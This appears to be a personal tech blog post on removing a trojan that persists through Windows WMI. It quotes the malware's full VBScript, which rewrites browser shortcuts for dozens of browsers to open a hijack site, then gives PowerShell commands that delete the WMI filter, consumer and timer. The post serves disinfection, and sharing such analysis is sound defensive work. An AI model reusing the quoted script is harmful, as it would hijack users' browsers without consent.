Skip to main content

HAO.169x.cn Virus removal.

Hello!
After fighting with this nasty trojan I finally found a solution.

The trojan resides inside windows WMI.

It executes a script that looks like this:


On Error Resume Next
Const link = "http://hao.169x.cn/?v=108&m=yx"
Const link360 = "http://hao.169x.cn/?v=108&m=yx&s=3"
browsers = "114ie.exe,115chrome.exe,1616browser.exe,2345chrome.exe,2345explorer.exe,360se.exe,360chrome.exe,,avant.exe,baidubrowser.exe,chgreenbrowser.exe,chrome.exe,firefox.exe,greenbrowser.exe,iexplore.exe,juzi.exe,kbrowser.exe,launcher.exe,liebao.exe,maxthon.exe,niuniubrowser.exe,qqbrowser.exe,sogouexplorer.exe,srie.exe,tango3.exe,theworld.exe,tiantian.exe,twchrome.exe,ucbrowser.exe,webgamegt.exe,xbrowser.exe,xttbrowser.exe,yidian.exe,yyexplorer.exe"
lnkpaths = "C:\Users\Public\Desktop,C:\ProgramData\Microsoft\Windows\Start Menu\Programs,C:\Users\shome\Desktop,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\StartMenu,C:\Users\shome\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar,C:\Users\shome\AppData\Roaming\Microsoft\Windows\Start Menu\Programs"
browsersArr = Split(browsers,",")
Set oDic = CreateObject("scripting.dictionary")
For Each browser In browsersArr
    oDic.Add LCase(browser), browser
Next
lnkpathsArr = Split(lnkpaths,",")
Set oFolders = CreateObject("scripting.dictionary")
For Each lnkpath In lnkpathsArr
    oFolders.Add lnkpath, lnkpath
Next
Set fso = CreateObject("Scripting.Filesystemobject")
Set WshShell = CreateObject("Wscript.Shell")
For Each oFolder In oFolders
    If fso.FolderExists(oFolder) Then
      For Each file In fso.GetFolder(oFolder).Files
            If LCase(fso.GetExtensionName(file.Path)) = "lnk" Then
                Set oShellLink = WshShell.CreateShortcut(file.Path)
                path = oShellLink.TargetPath
                name = fso.GetBaseName(path) & "." & fso.GetExtensionName(path)
                If oDic.Exists(LCase(name)) Then
                  If LCase(name) = LCase("360se.exe") Then
                        oShellLink.Arguments = link360
                  Else
                        oShellLink.Arguments = link
                  End If
                  If file.Attributes And 1 Then
                        file.Attributes = file.Attributes - 1
                  End If
                  oShellLink.Save
                End If
            End If
      Next
    End If
Next
to remove it is quite simple:

run powershell as administrator and the issue these 4 commands:


gwmi -Namespace "root/cimv2" -Class __FilterToConsumerBinding -Filter "Filter = ""__eventfilter.name='VBScriptKids_filter'""" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class ActiveScriptEventConsumer -Filter "Name = 'VBScriptKids_consumer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __IntervalTimerInstruction -Filter "TimerID = 'VBScriptKids_timer'" | Remove-WmiObject
gwmi -Namespace "root/cimv2" -Class __EventFilter -Filter "Name = 'VBScriptKids_filter'" | Remove-WmiObject


P.S.
The trojan has been found in many softwares including KMS10.
You should remove these softwares too.


Comments

Post a Comment

Popular posts from this blog

Powerline Ethernet fun and secrets.

Many 200 Mb/s powerline adapters nowadays are based on the INTELLON 6300 chipset. Despite what can be thought looking at them, they are all using the same hardware and firmwares. I heard many people with Netgear XAV101 or Linksys PLK 200 or PLE 200 having problems after firmware updates and many other people with other brands having much more problems because of lack of support or configuration/upgrade utilities. So let me explain a few things I learnt studying them. Many of 200 Mb/s powerline ethernet adapters follow the "HomePlug AV" standard. (85 Mb adapters use HomePlug 1.0 standard which is completely different). This standard uses ethernet broadcast packets using the HomePlug AV protocol. The interesting thing is that their firmware is made of two different parts: a .PIB file (Parameter Information Block) and a .NVM file (the code itself). In the P.I.B. there are many interesting things: The branding (mac address, device name, etc) and the tone map. I test

TP-LINK Configuration file encrypt and decrypt.

Here we go! TP-Link is another company that thinks that security by obscurity could ever work. If you "backup" the configuration from most TP-Link routers, you will get a .BIN file which is "encrypted". Use this utility below, to decrypt it (so you can edit it) and encrypt it again. Have fun. Drop files here or

Huawei E585 Unlock download!

Here is the unlocker for you to download! Highlights: 1) very fast (2-3 seconds) 2) Compatible with Xp, Vista and Win7 3) easy to use. Instructions: Download the program. Run the program. Donate via paypal and PASTE the  confirmation number  of your donation. The transaction id should work after a minute from your donation. Donate using the window opened by the program. The code will work only on the PC you run the program. This program works only with Huawei E585. Send me an email if you need an unlimited version. (Unlimited number of unlocks) Note: If the program says "Connect card." that means that E585 drivers are not installed correctly. Remove any "wifi manager" and old drivers, then reinstall E585 drivers from it's virtual cdrom. Please be sure that you have run "autorun.exe" which should have appeared in a pop-up window when you first inserted the Mifi.  This is required to install all the drivers that are needed for the modificatio